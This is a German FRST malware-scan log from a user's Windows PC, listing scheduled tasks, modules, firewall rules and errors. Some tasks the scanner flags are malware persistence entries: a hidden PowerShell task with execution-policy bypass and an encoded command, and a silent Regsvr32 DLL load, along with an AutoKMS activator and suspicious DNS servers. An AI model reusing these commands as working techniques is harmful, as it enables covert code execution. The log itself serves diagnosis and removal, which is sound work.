Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEABCBF8-4763-43D1-883B-86C80CB16A79} - System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (Der Dateneintrag hat 9732 mehr Zeichen). <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll 2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl 2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl 2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl 2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl 2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe 2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe 2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe 2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2010-07-15 06:44 - 2010-07-15 06:44 - 00020032 _____ () C:\Program Files\Unlocker\UnlockerCOM.dll 2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll 2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll 
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe 2017-05-09 21:31 - 2017-05-09 21:31 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2017-05-09 21:31 - 2017-05-09 21:31 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2017-05-09 21:31 - 2017-05-09 21:31 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2017-05-09 21:31 - 2017-05-09 21:31 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll 2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe 2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe 2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui 2017-05-07 17:13 - 2017-05-21 20:55 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll 2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll 2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll 2015-04-25 07:20 - 
2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll 2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll 2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll 2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll 2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll 2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll 2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll 2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll 2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll 2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll 2017-01-22 15:26 - 2017-01-04 15:28 - 01958912 _____ () 
C:\Users\Dino\AppData\Local\Discord\app-0.0.297\ffmpeg.dll 2017-01-22 15:26 - 2017-01-22 15:26 - 01082880 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_voice\discord_voice.node 2017-01-22 15:26 - 2017-01-22 15:26 - 03750400 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_voice\libdiscord.dll 2017-01-22 15:26 - 2017-01-22 15:26 - 00914432 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_utils\discord_utils.node 2017-01-22 15:26 - 2017-01-22 15:26 - 01127424 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_toaster\discord_toaster.node 2017-01-22 15:26 - 2017-01-04 15:28 - 02278912 _____ () C:\Users\Dino\AppData\Local\Discord\app-0.0.297\libglesv2.dll 2017-01-22 15:26 - 2017-01-04 15:28 - 00096768 _____ () C:\Users\Dino\AppData\Local\Discord\app-0.0.297\libegl.dll 2017-05-21 21:22 - 2017-05-21 21:22 - 00148992 _____ () \\?\C:\Users\Dino\AppData\Local\Temp\2F77.tmp.node 2017-01-22 15:26 - 2017-05-01 13:16 - 02658296 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_rpc\discord_rpc.node 2017-01-22 15:26 - 2017-05-01 13:16 - 02665976 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_contact_import\discord_contact_import.node ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) AlternateDataStreams: C:\Users\Dino\Desktop\tdsskiller.exe:BDU [0] ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) 
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2017-05-21 20:57 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 82.163.143.157 - 82.163.142.159
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{83AD83AC-5138-49A1-AFE6-642DD681957A}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{9F1EF34D-804D-4346-AA62-2A72FA0FBF6F}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{BDC0A943-FFD9-4C31-97CB-2F5C6223930F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{6208BE91-3EEB-4FD5-A9F6-AAF6B8B6DAD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{BDBD0D1C-E183-400A-95C5-7EC28883BDC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{B0EFBE9B-6683-4F5E-B370-26BC5FBB1834}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{B390EB1F-B557-4043-8E63-554A25E1FFA8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Ghost Recon Wildlands Beta\GRW.exe FirewallRules: [{4CE2A673-3091-4652-A0F4-EC8E65F46CDC}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division PTS\TheDivision.exe FirewallRules: [{A8417FA2-B44F-4117-8D45-30BCFD8686E6}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe FirewallRules: [{100496F8-41F8-47A3-85DD-5D420F581AEB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe FirewallRules: [UDP Query User{2E4F3652-EFD6-4881-9213-8EA61F89A46F}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe FirewallRules: [TCP Query User{88C41D9B-BB60-4F64-BC68-6DAB1AF7FB31}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe FirewallRules: [UDP Query User{47CE1527-A9E5-4FA6-8A51-6B1E508DD7AC}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft 
ii\versions\base38996\sc2_x64.exe FirewallRules: [TCP Query User{13A38046-9894-492B-9138-E3CF3B213870}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe FirewallRules: [{99E199FA-1006-4A25-8A08-E28651356CDF}] => (Allow) D:\Programme\Ubisoft\Anno 2205\Bin\Win64\Anno2205.exe FirewallRules: [{F3A38691-4442-4EAC-B3E6-B9767F22C203}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe FirewallRules: [{A15E195A-CCA8-4C1D-84C5-546BF8AAE637}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe FirewallRules: [TCP Query User{A6300EE9-EEE9-43B8-B529-D238E94D113B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{35161E84-F39F-429F-8D6F-A6CFC8EC13DF}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [{9CE73BB9-D886-4EA9-9EDD-54D04E01DB68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{C60179E6-4096-438F-A0AE-D7E540CE18C9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{A5BC860D-355B-4935-99F7-09C0A701AAAA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{62A800D2-8909-45FC-BFD5-612EF096C6F1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{24A88AFE-6316-461C-984E-4AF8F05FCC96}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{FF456D46-8990-4A73-82F7-4A5484372E42}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{CCDDE9C4-05CA-48D1-90C8-2D615BC7B643}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe FirewallRules: [{607A7BED-54D2-4F98-B9A6-4F5D91E07585}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe FirewallRules: [{DBABDDB1-A8F5-4509-A5A6-1A9F0EF2F69D}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 
2070\Anno5.exe FirewallRules: [{66B9313C-1DF5-470C-B1BD-9064863CA77A}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe FirewallRules: [{38C3B3D0-D3E0-4BB2-8D00-595270146FE7}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe FirewallRules: [{71C075D1-31A5-4E48-B456-75C0CC247DA6}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe FirewallRules: [{859B27CC-891C-45EC-8310-BCCAAC722A85}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe FirewallRules: [{FC73742C-58EE-43B8-B2E2-0755BDB79FAB}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe FirewallRules: [TCP Query User{D780C36A-DADD-4902-950C-1B44C2B4591C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{6BF43327-BDB7-4AB4-898E-8A25BE985091}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [{3F0F651B-1103-4AE2-9098-9BCC4F26404D}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe FirewallRules: [{203174F0-92DD-4D57-B97E-47C4CAC797B9}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe FirewallRules: [TCP Query User{DAB2A3D3-0749-4FBF-BA46-7878A1B608DF}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe FirewallRules: [UDP Query User{2538DCE0-9E21-47AC-8348-A452790F29F9}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe FirewallRules: [{51A9B374-5A57-46AB-A962-C889763A43AD}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe FirewallRules: [{67DCCF13-0AEA-4A47-8084-823442F272BB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe FirewallRules: 
[{300F8BBD-78E2-41E0-8EC4-16DF8E59E651}] => (Allow) D:\Programme\Ubisoft\Anno4.exe FirewallRules: [{C5360BE6-1303-4A0E-8023-CC62F60B1E04}] => (Allow) D:\Programme\Ubisoft\Anno4.exe FirewallRules: [{9274C44A-8563-4D10-AD7B-8DF46B5A8A84}] => (Allow) D:\Programme\Ubisoft\Addon.exe FirewallRules: [{FC814241-9258-4F19-AF41-DB88E23957C1}] => (Allow) D:\Programme\Ubisoft\Addon.exe FirewallRules: [{0B9C568A-9F54-4F5F-8A13-29E3E60DFD10}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe FirewallRules: [{0A57F8DB-B618-48DA-A350-95E445171171}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe FirewallRules: [{B609DA77-EEAE-4331-AF04-D6B0B12DD462}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe FirewallRules: [{7F026620-DD5A-46CF-A2A1-E22FB29A9F0F}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe FirewallRules: [{6207A230-EB6A-4610-B892-DF526C5DA9CB}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe FirewallRules: [{6413A299-3AE2-4728-8D88-DBC7F4693304}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe FirewallRules: [{8395ECDA-6B23-440A-961A-1338B31E9BCF}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe FirewallRules: [{F954F9EC-FC53-42E6-8C62-5FAAB7F337F6}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe FirewallRules: [{E6D4C42C-CFAE-433E-A5C8-75DD628070A2}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe FirewallRules: [{DA17C889-BA52-4AEA-B1F7-56B213754083}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe FirewallRules: [{B064A02F-82D3-46C7-BE5E-4847D6F8F3DD}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe FirewallRules: [{46A60120-A927-4D76-888D-6D7D4D4928C8}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe FirewallRules: [{614BDF81-34E7-4EF0-AF9D-124919FC7689}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe FirewallRules: [{D83D6FE6-C127-45CA-9089-CB5A015F1059}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe FirewallRules: [{8C525B9B-2F76-4D2A-88BF-33045C4BF9F4}] => (Allow) 
D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe FirewallRules: [{8170164A-B9FD-4092-A573-9EEFE3E8D466}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe FirewallRules: [TCP Query User{D3C7FE0D-703D-47B1-8FA2-AB9592BF1E7B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{6BF3876D-F5A1-4D45-B983-F240E0C30606}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe FirewallRules: [{3495CC5B-8440-473C-99FE-BB14A3B532D1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Wiederherstellungspunkte ========================= 19-05-2017 15:50:08 Geplanter Prüfpunkt 21-05-2017 20:53:51 Revo Uninstaller's restore point - Spybot - Search & Destroy ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (05/21/2017 08:56:28 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0x1ba0 Startzeit der fehlerhaften Anwendung: 0x01d2d263f2a109cb Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: ae299761-9933-4de1-aba7-7a3113a27840 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/21/2017 08:53:51 PM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter 
Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471} Error: (05/21/2017 12:27:16 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/21/2017 12:24:29 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0xbd0 Startzeit der fehlerhaften Anwendung: 0x01d2d21c6c50fef8 Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: f582f64c-3373-478a-a15b-f929adac582c Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/20/2017 08:03:18 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0xde4 Startzeit der fehlerhaften Anwendung: 0x01d2d1935ab86bd9 Pfad der fehlerhaften 
